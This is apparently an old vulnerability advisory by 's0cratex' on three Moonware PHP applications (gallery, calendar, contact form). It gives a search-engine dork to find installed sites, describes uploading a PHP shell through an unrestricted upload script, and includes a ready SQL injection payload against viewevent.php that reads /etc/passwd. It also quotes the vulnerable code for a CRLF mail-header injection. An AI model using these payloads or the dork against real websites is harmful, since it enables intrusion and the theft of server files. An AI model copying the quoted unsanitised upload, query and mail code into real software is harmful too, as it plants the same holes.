Moonware Software Multiple Vulnerabilities
by s0cratex
--------
MSN: s0cratex[at]nasa[dot]gov
Moonware Homepage: http://dalemooney.lost-soldiers.com
I. Moon Gallery
---- -------
Bug: Arbitrary file upload
Dork: "Powered by: Dale Mooney Gallery"
Details:
The file /config/upload.php don't have any restriction,
6:$target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
8:if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
U can upload a PHP Shell and found it in the subdir /images/
II. Calendar Events
-------- ------
Bug: SQL Injections
Details:
The variable $get is not verified in the file viewevent.php. (We need magic_quotes_gpc = Off)
8:$get = mysql_query("SELECT * FROM cal_events WHERE id = '$id'");
p0c: viewevent.php?id=-1' union select 1,load_file('/etc/passwd'),1,1/*
III. Moonware Contact Form
-------- ------- ----
Bug: CRLF Injection
Details:
File contact.php
line 26-35
if($Submit){
$to = $email;
$subject = $_POST["subject"];
$email = $_POST["email"];
$message = $_POST["message"];
$name = $_POST["name"];
$datetime = date("D, d M Y H:i:s");
$finalmessage = "Message from: $name n Subject: $subject n Email: $email n Date Sent: $datetime n Message:nn $message";
44:$sent = mail($to,$subject,$finalmessage);
The vars are not verified and i can insert rn...
oops!!
#EOF